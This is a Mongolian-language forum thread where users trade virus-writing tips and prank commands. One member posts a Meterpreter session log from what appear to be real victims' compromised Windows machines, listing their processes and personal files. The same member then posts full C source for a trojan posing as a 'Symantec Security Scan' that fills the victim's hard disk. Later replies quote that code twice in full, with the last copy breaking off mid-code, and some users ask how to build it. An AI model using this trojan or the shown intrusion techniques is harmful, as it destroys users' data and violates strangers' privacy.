#AsuultSambar :

ASUULT.NET - МОНГОЛ УЛС МАНДАН БАДРАГ!
It is currently Aug.18.19 2:39 pm

All times are UTC+09:00




Post new topic  Reply to topic  [ 95 posts ]  Go to page Previous 1 2 3 4
Author Message
PostPosted: Jul.17.11 8:45 pm 
Offline
Дvрэлзэх Дөл Гишvvн
User avatar

Joined: May.18.10 6:55 pm
Posts: 1655
Location: Middle-earth
shutdown -s -t 5 -c "Wuhahahahaha"


Top
   
PostPosted: Jul.17.11 8:46 pm 
Offline
Дvрэлзэх Дөл Гишvvн
User avatar

Joined: May.18.10 6:55 pm
Posts: 1655
Location: Middle-earth
bi sayhan uur hvnii computerees hden failuud awsan yumldaa.tegsen chine flashnii ner ni removable disk bolj uurchlugduud dotorhi failuud ni baihgui bna.Getel flashniihaa propertiesiig uztel size ni 700mb yag failuud maani hemjeetei bh yum.tools>folder options>show all hidden file бас system files iig ashiglaj uztel failuud maani garch irku bna yahuu


Top
   
PostPosted: Aug.05.11 11:55 am 
Offline
Эелдэг Гишvvн
Эелдэг Гишvvн

Joined: Aug.03.11 6:55 pm
Posts: 62
oir zuur virus bicheh amarhan ldaa. vbs er bichej blno..nogo aldarta virusuud chin source ni bol odoo tarzanshde..i love u virusiin source iig harj bailaa..hylbar.. odoo bl heterhii engiin virus...odoo iimerhu virus bicheed amchiltand hurku l bh..iluu goy virus iig ASM der bichdeg .


Top
   
PostPosted: Aug.07.11 3:29 am 
Offline
Хавар Цагийн Анхны Яргуй
User avatar

Joined: Feb.28.03 6:07 pm
Posts: 3493
Location: Зүрх бол тэнэг эрхтэн тул тархиараа сэтгэ.
Quote:
oir zuur virus bicheh amarhan ldaa. vbs er bichej blno..nogo aldarta virusuud chin source ni bol odoo tarzanshde..i love u virusiin source iig harj bailaa..hylbar.. odoo bl heterhii engiin virus...odoo iimerhu virus bicheed amchiltand hurku l bh..iluu goy virus iig ASM der bichdeg .
Өөн тийм үү.Лаг ийн тээ. Үргэлжлүүлээд байгаарай.

_________________
Bariin syylnees batganii tolgoi


Top
   
PostPosted: Aug.07.11 5:13 pm 
Offline
Asuult Precious Member
User avatar

Joined: Feb.07.09 9:44 pm
Posts: 4776
Location: Ulaanbaatar Mongolia
За нэг юм оруулая мэддэгүүд нь мэдэн байх
Code:
msf exploit(handler) > sessions

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  3   Meterpreter  192.168.1.5:1337 -> 59.164.100.104:2703
  4   Meterpreter  192.168.1.5:1337 -> 59.164.100.104:2728
  5   Meterpreter  192.168.1.5:1337 -> 79.101.215.123:19428
  7   Meterpreter  192.168.1.5:1337 -> 79.101.215.123:19440
  8   Meterpreter  192.168.1.5:1337 -> 79.101.215.123:19645
  11  Meterpreter  192.168.1.5:1337 -> 201.95.140.244:2329
  12  Meterpreter  192.168.1.5:1337 -> 201.95.140.244:2349
  14  Meterpreter  192.168.1.5:1337 -> 201.95.140.244:2368
  15  Meterpreter  192.168.1.5:1337 -> 201.95.140.244:2423

msf exploit(handler) > sessions -i 15
[*] Starting interaction with 15...

meterpreter > ps

Process list
============

    PID   Name                   Path
    ---   ----                   ----
    184   jusched.exe            C:\Arquivos de programas\Java\jre6\bin\jusched.exe
    240   sched.exe              C:\Arquivos de programas\Avira\AntiVir Desktop\sched.exe
    308   avgnt.exe              C:\Arquivos de programas\Avira\AntiVir Desktop\avgnt.exe
    316   msseces.exe            C:\Arquivos de programas\Microsoft Security Essentials\msseces.exe
    336   igfxtray.exe           C:\WINDOWS\system32\igfxtray.exe
    364   hkcmd.exe              C:\WINDOWS\system32\hkcmd.exe
    396   igfxpers.exe           C:\WINDOWS\system32\igfxpers.exe
    412   ctfmon.exe             C:\WINDOWS\system32\ctfmon.exe
    432   NMBgMonitor.exe        C:\Arquivos de programas\Arquivos comuns\Ahead\Lib\NMBgMonitor.exe
    596   smss.exe               \SystemRoot\System32\smss.exe
    668   winlogon.exe           \??\C:\WINDOWS\system32\winlogon.exe
    712   services.exe           C:\WINDOWS\system32\services.exe
    724   lsass.exe              C:\WINDOWS\system32\lsass.exe
    904   svchost.exe            C:\WINDOWS\system32\svchost.exe
    1080  patch.exe              C:\Documents and Settings\User\Meus documentos\Downloads\patch.exe
    1088  agrsmsvc.exe           C:\Arquivos de programas\LSI SoftModem\agrsmsvc.exe
    1104  avguard.exe            C:\Arquivos de programas\Avira\AntiVir Desktop\avguard.exe
    1236  uTorrent.exe           C:\Arquivos de programas\uTorrent\uTorrent.exe
    1244  jqs.exe                C:\Arquivos de programas\Java\jre6\bin\jqs.exe
    1324  MsMpEng.exe            C:\Arquivos de programas\Microsoft Security Essentials\MsMpEng.exe
    1364  svchost.exe            C:\WINDOWS\System32\svchost.exe
    1492  MDM.EXE                C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\VS7DEBUG\MDM.EXE
    1676  SeaPort.exe            C:\Arquivos de programas\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
    1736  Explorer.EXE           C:\WINDOWS\Explorer.EXE
    1928  spoolsv.exe            C:\WINDOWS\system32\spoolsv.exe
    1964  AVGIDSAgent.exe        C:\Arquivos de programas\AVG\AVG9\Identity Protection\Agent\Bin\AVGIDSAgent.exe
    2160  NMIndexingService.exe  C:\Arquivos de programas\Arquivos comuns\Ahead\Lib\NMIndexingService.exe
    2404  NMIndexStoreSvr.exe    C:\Arquivos de programas\Arquivos comuns\Ahead\Lib\NMIndexStoreSvr.exe
    3428  patch.exe              C:\Documents and Settings\User\Meus documentos\Downloads\patch.exe
    3584  wlcomm.exe             C:\Arquivos de programas\Windows Live\Contacts\wlcomm.exe
    3672  patch.exe              C:\Documents and Settings\User\Meus documentos\Downloads\patch.exe
    3792  msnmsgr.exe            C:\Arquivos de programas\Windows Live\Messenger\msnmsgr.exe
    3944  wuauclt.exe            C:\WINDOWS\system32\wuauclt.exe
    4048  patch.exe              C:\Documents and Settings\User\Meus documentos\Downloads\patch.exe

meterpreter > ls

Listing: C:\Documents and Settings\User\Meus documentos\Downloads
=================================================================

Mode              Size   Type  Last modified                   Name
----              ----   ----  -------------                   ----
40777/rwxrwxrwx   0      dir   Sun Nov 08 15:04:31 -0500 2009  .
40555/r-xr-xr-x   0      dir   Sun Nov 08 15:04:31 -0500 2009  ..
100777/rwxrwxrwx  87552  fil   Sun Nov 08 15:04:34 -0500 2009  patch.exe

meterpreter > cd ..
meterpreter > ls

Listing: C:\Documents and Settings\User\Meus documentos
=======================================================

Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40555/r-xr-xr-x   0        dir   Sun Nov 08 15:04:31 -0500 2009  .
40777/rwxrwxrwx   0        dir   Fri Nov 06 16:51:00 -0500 2009  ..
100666/rw-rw-rw-  318159   fil   Thu Oct 01 14:48:36 -0400 2009  10192757.cab
100666/rw-rw-rw-  515      fil   Tue Mar 17 09:00:07 -0400 2009  Atalho para familia.lnk
40777/rwxrwxrwx   0        dir   Sun Nov 08 15:04:31 -0500 2009  Downloads
40777/rwxrwxrwx   0        dir   Thu Mar 12 10:06:07 -0400 2009  Dungeon Siege Demo
100666/rw-rw-rw-  7005     fil   Fri Jul 28 07:32:44 -0400 2006  Eula.txt
40777/rwxrwxrwx   0        dir   Mon Apr 21 09:07:46 -0400 2008  GetIP.1.0.0.2
40777/rwxrwxrwx   0        dir   Thu Nov 05 11:06:03 -0500 2009  Meus arquivos recebidos
40555/r-xr-xr-x   0        dir   Mon Mar 16 18:51:35 -0400 2009  Meus v�deos
100666/rw-rw-rw-  946      fil   Mon Oct 05 18:29:10 -0400 2009  Minhas Pastas de Compartilhamento.lnk
40555/r-xr-xr-x   0        dir   Mon Mar 16 10:15:20 -0400 2009  Minhas imagens
40555/r-xr-xr-x   0        dir   Wed Jan 14 08:50:18 -0500 2009  Minhas m�sicas
40555/r-xr-xr-x   0        dir   Fri Sep 11 17:30:51 -0400 2009  My Stationery
40777/rwxrwxrwx   0        dir   Thu Mar 05 18:12:28 -0500 2009  NeroVision
100666/rw-rw-rw-  505      fil   Sun Nov 08 15:03:42 -0500 2009  Patch_for_Adobe_CS4_Piraters_-_fixes_anoying_nag_bugs.5152367.TPB.torrent
100666/rw-rw-rw-  4419     fil   Sun Mar 15 13:42:21 -0400 2009  Poema 2.rtf
100777/rwxrwxrwx  150888   fil   Mon Mar 16 11:16:58 -0400 2009  Tcpvcon.exe
100777/rwxrwxrwx  198504   fil   Mon Mar 16 11:16:58 -0400 2009  Tcpview.exe
40777/rwxrwxrwx   0        dir   Wed Apr 29 14:53:40 -0400 2009  Warlords Battlecry II Demo
100666/rw-rw-rw-  78       fil   Wed Jan 14 08:50:18 -0500 2009  desktop.ini
100666/rw-rw-rw-  4063     fil   Wed Mar 18 08:38:19 -0400 2009  e-mail.rtf
100666/rw-rw-rw-  3848     fil   Sun Mar 15 18:59:27 -0400 2009  familia.rtf
100666/rw-rw-rw-  4052     fil   Tue Mar 17 08:48:32 -0400 2009  mus�ca.rtf
100666/rw-rw-rw-  4049     fil   Sun Mar 15 13:36:00 -0400 2009  poema   1.rtf
100666/rw-rw-rw-  4610     fil   Sun Mar 15 13:49:29 -0400 2009  poema   3.rtf
100666/rw-rw-rw-  412      fil   Fri Feb 20 18:51:21 -0500 2009  spider.sav
100666/rw-rw-rw-  40016    fil   Mon Oct 30 06:32:50 -0500 2006  tcpview.chm
100666/rw-rw-rw-  384      fil   Sun Mar 15 16:27:57 -0400 2009  texto 1.rtf
100777/rwxrwxrwx  395056   fil   Sun Nov 08 14:22:39 -0500 2009  utorrent-2.1-beta.exe
100777/rwxrwxrwx  2940248  fil   Tue Oct 13 11:13:40 -0400 2009  winRAR.exe
100666/rw-rw-rw-  3756     fil   Wed Mar 18 08:39:35 -0400 2009  ytggtfggfhfgvfrftfftgftftftftffcfffrdrfvcdydgdgfsgx.rtf
100666/rw-rw-rw-  188      fil   Tue Mar 17 19:46:07 -0400 2009  ytxrt.rtf

_________________
./node signature.js


Top
   
PostPosted: Aug.07.11 6:32 pm 
Offline
Asuult Precious Member
User avatar

Joined: Feb.07.09 9:44 pm
Posts: 4776
Location: Ulaanbaatar Mongolia
Хард дүүрэгдэг трожан хэхэ гэхдээ зүгээр дүүрэгсэн юм шиг болгодог
Code:
/* SPACE EATER TROJAN BY SRIKANTH. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}

_________________
./node signature.js


Top
   
PostPosted: Aug.07.11 9:44 pm 
Offline
• ISIA Member ***

Joined: Oct.04.05 1:22 pm
Posts: 19344
Энэ хүмүүс хөгийн юм сэтгэж байгаамшүү. :hihi:


Top
   
PostPosted: Aug.23.11 7:30 pm 
Offline
Сэвэлзэх Салхины Сэрчигнээн
Сэвэлзэх Салхины Сэрчигнээн
User avatar

Joined: Sep.09.09 10:08 am
Posts: 241
Location: Хүн болгоны байдаг газар хөл дээрээ.
Quote:
Хард дүүрэгдэг трожан хэхэ гэхдээ зүгээр дүүрэгсэн юм шиг болгодог
Code:
/* SPACE EATER TROJAN BY SRIKANTH. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
Eniigee yun dee yaj bichih vv?
Notepad dee bat-aar bichih vv?

_________________
Wonderful Things=BookS


Top
   
PostPosted: Aug.23.11 9:25 pm 
Offline
Asuult Precious Member
User avatar

Joined: Feb.07.09 9:44 pm
Posts: 4776
Location: Ulaanbaatar Mongolia
Quote:
Quote:
Хард дүүрэгдэг трожан хэхэ гэхдээ зүгээр дүүрэгсэн юм шиг болгодог
Code:
/* SPACE EATER TROJAN BY SRIKANTH. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
Eniigee yun dee yaj bichih vv?
Notepad dee bat-aar bichih vv?
Яах нь вэ? айн :imhappy:

_________________
./node signature.js


Top
   
PostPosted: Mar.29.12 4:49 pm 
Offline
• Moderator
<b><font color=#000099>• Moderator</font></b>
User avatar

Joined: Jun.28.10 5:25 pm
Posts: 2289
Location: Хэнийг ч битгий үзэн яд эцэстээ бүгдээрээ үхэхээс хойш
gertee hiij vzdiimuu


Top
   
PostPosted: Aug.05.12 12:49 am 
Offline
Yзэсгэлэнт Гишvvн
Yзэсгэлэнт Гишvvн
User avatar

Joined: Jul.10.12 6:29 pm
Posts: 335
ioms 89 tegj bgd hiih gej oroldnoo :lol:

_________________
www.kinobox.co цахим кино театер


Top
   
PostPosted: Aug.08.12 1:30 pm 
Offline
Шинэков Гишvvн
Шинэков Гишvvн

Joined: Aug.08.12 12:45 pm
Posts: 2
Quote:
virus yamar heldeer bichij bna


Top
   
PostPosted: Aug.08.12 1:32 pm 
Offline
Шинэков Гишvvн
Шинэков Гишvvн

Joined: Aug.08.12 12:45 pm
Posts: 2
Code:
gertee hiij vzdiimuu
C C++ suraal bjdee


Top
   
PostPosted: Jun.18.13 8:44 pm 
Offline
Yзэсгэлэнт Гишvvн
Yзэсгэлэнт Гишvvн
User avatar

Joined: Jul.10.12 6:29 pm
Posts: 335
cmd гээ нээгээд shutdown -s -t "60" -c "bye2"
тэгээд энтэрээ дар.
ерөндөг нь cmd нэгээд shutdown -a

_________________
www.kinobox.co цахим кино театер


Top
   
PostPosted: Oct.24.14 8:29 am 
Offline
Тод Гишvvн
Тод Гишvvн
User avatar

Joined: Nov.01.07 7:17 pm
Posts: 75
Quote:
Quote:
Хард дүүрэгдэг трожан хэхэ гэхдээ зүгээр дүүрэгсэн юм шиг болгодог
Code:
/* SPACE EATER TROJAN BY SRIKANTH. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
